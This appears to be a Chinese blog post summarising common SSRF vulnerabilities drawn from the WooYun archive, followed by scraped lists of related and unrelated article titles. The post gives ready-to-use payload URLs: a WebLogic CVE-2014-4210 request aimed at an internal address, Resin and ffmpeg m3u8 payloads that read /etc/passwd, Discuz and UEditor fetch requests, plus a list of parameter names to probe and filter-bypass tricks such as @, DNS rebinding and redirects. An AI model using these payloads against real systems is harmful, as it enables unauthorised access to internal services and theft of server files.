wooyun常见ssrf总结

前言

wooyun有很多旧时代知识沉淀，需要多看看，才能更好地迈向新时代。

0x01. weblogic

CVE-2014-4210

http://221.239.120.208/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.9.136&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

0x02. resin

http://xxxx/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd

0x03.xxe

解析xml的地方可能产生xxe漏洞，也能用于利用ssrf

0x04. ffmpg

早期ffmpg是存在ssrf漏洞的，现在应该基本没有了。

如果读取多行，可以用subfile

#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://val.com/header.m3u8|subfile,,start,0,end,31,,:///etc/passwd|subfile,,start,32,end,64,,:///etc/passwd|subfile,,start,65,end,97,,:///etc/passwd #EXT-X-ENDLIST 使用subfile

0x05.discuz

discuz一些版本存在ssrf

http://xxxx/bbs/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://xxxxxxxxxxxxxx.jpg[/img]&formhash=09cec465

3.x版本需要带上formhash

0x06.ueditor+dnsrebind

/editor/ueditor/php/controller.php?action=catchimage&source[]=http://my.ip/?aaa=1%26logo.png

0x07.常见的业务接口

剩下就是一些和业务相关的了，图片、下载、获取资源等

src_url=
sr=
url=
qrcodeUrl=
picPath=
source_url=
upfile=
img=
source=
pageurl=
remoteUrl=
path=
p=
key=
link=
domain=
apiurl=

0x08.绕过姿势

实战中用的比较多的是

1.@
2.xip.io
3.进制
4.302（短网址）
5.dnsrebind
6.unicode
7.wooyun看到有些人是这么绕的127.0.0.1a，可能是判定黑名单的在强制转换前面。
8.xss，有的后端会解析输入的js返回到前端，这里也是存在ssrf的可能的。可能位置在文档、渲染等地方

wooyun常见ssrf总结+常见ssrf绕过姿势相关推荐

1. 从一文中了解SSRF的各种绕过姿势及攻击思路

   文章目录 声明 前言 漏洞相关信息 漏洞成因 漏洞定义 漏洞危害 所涉函数 curl_exec() file_get_contents() fsockopen() 所涉协议 file伪协议 Gophe ...

2. 浅谈XSS攻击的那些事（附常用绕过姿势）

   本文<浅谈XSS攻击的那些事(附常用绕过姿势)> 由一叶知安团队原创投稿安全脉搏首发,作者geek痕,安全脉搏独家首发表本文,如需要转载,请先联系安全脉搏授权:未经授权请勿转载. 随着互联 ...

3. 各种文件上传绕过姿势（一）

   各种文件上传绕过姿势 **目录** 各种文件上传绕过姿势 写在前面 一.前端绕过 1.1 防护手段 1.2 绕过方法 二.检查MIME类型 2.1 防护手段 2.2 绕过方法 三.黑名单绕过(一) 3 ...

4. html文件上传漏洞,文件上传漏洞（绕过姿势）

   文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接.但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识.俗话说,知己知彼方能百战不殆,因此 ...

5. 文件上传绕过姿势整理

   文件上传绕过姿势整理 WAF绕过 安全狗绕过 1.绕过思路:对文件的内容,数据.数据包进行处理. 关键点在这里Content-Disposition: form-data; name="fi ...

6. [转]辨别常见与不常见音乐文件格式的质量好坏！

   辨别常见与不常见音乐文件格式的质量好坏! 要在计算机内播放或是处理音频文件,也就是要对声音文件进行数.模转换,这个过程同样由采样和量化构成,人耳所能听到的声音,最低的频率是从20Hz起一直到最高频率2 ...

7. sql注入绕过姿势--骚姿势大全

   项目地址 https://github.com/Junehck/SQL-injection-bypass 项目介绍 记录实战中的各种sql注入绕过姿势, 文章并不是完整的仅提取出byapss部分, 如 ...

8. 常见变异影响常见疾病，罕见变异影响罕见疾病？

   一般来说,常见变异影响常见疾病,罕见变异影响罕见疾病. 常见疾病/表型(比如糖尿病.身高),一般都是由许多微效作用位点共同影响的. 罕见疾病(比如家族性乳糜微粒血症综合征),一般由一个或几个效应值极强 ...

9. php常见后缀绕过,文件包含漏洞(绕过姿势)

   文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接.但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识.俗话说,知己知彼方能百战不殆,因此 ...

最新文章

1. RuntimeError: one of the variables needed for gradient computation has been modified by an inplace o
2. 重建包含快照的vmdk描述文件。
3. Turtle-可视化界面画圣诞树
4. UITT-欧盟MiFID II新监管法规实践先行者
5. mybatis做批量删除时写SQL语句时遇到的问题
6. CentOS远程监控
7. C#笔记20：多线程之线程同步中的信号量AutoResetEvent和ManualResetEvent
8. Acer 4750 安装黑苹果_黑苹果 Mac OS 10.14.5 Mojave 安装
9. 三种方法帮你恢复删除的文件
10. 计算机专业英语求职信范文及翻译,英文求职信范文带翻译150字-.doc
11. 计算机原理与体系结构王海瑞答案,袁梅
12. 膨胀卷积(空洞卷积)学习篇
13. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell（三）
14. 在html中写响应式布局的代码,CSS实现响应式布局的方法
15. UML建模、数据库设计和UI设计工具
16. 1970-01-01是什么？为什么计算机起始时间是1970年1月1日
17. Python学校Day06
18. Laplace变换的引入
19. Reallusion iClone Pro（实时3d动画设计软件）官方正式版V7.92.5425.1 | 含iclone7安装教程以及iclone7设置中文方法
20. 2021年安全员-C证考试资料及安全员-C证模拟考试题库

热门文章

1. mysql 8.0 + The Auto-extending innodb_system data file ‘./ibdata1‘ is of a different size 768 pages
2. 将JavaWeb项目war包部署到阿里云服务器
3. AI文案通过图灵测试！一秒生成2万条广告神器问世
4. 手机无盘服务器,无盘游戏服务器
5. android查询流量套餐,实现流量套餐  |  Android 开源项目  |  Android Open Source Project...
6. 讲清楚embedding到底在干什么
7. python ——静态变量
8. 广告牌定时器怎么设置时间_定时开关怎么调时间？
9. 跟着王进老师学Python：初识Python-王进-专题视频课程
10. 轻松将多个竖屏视频改为横屏，格式转为TS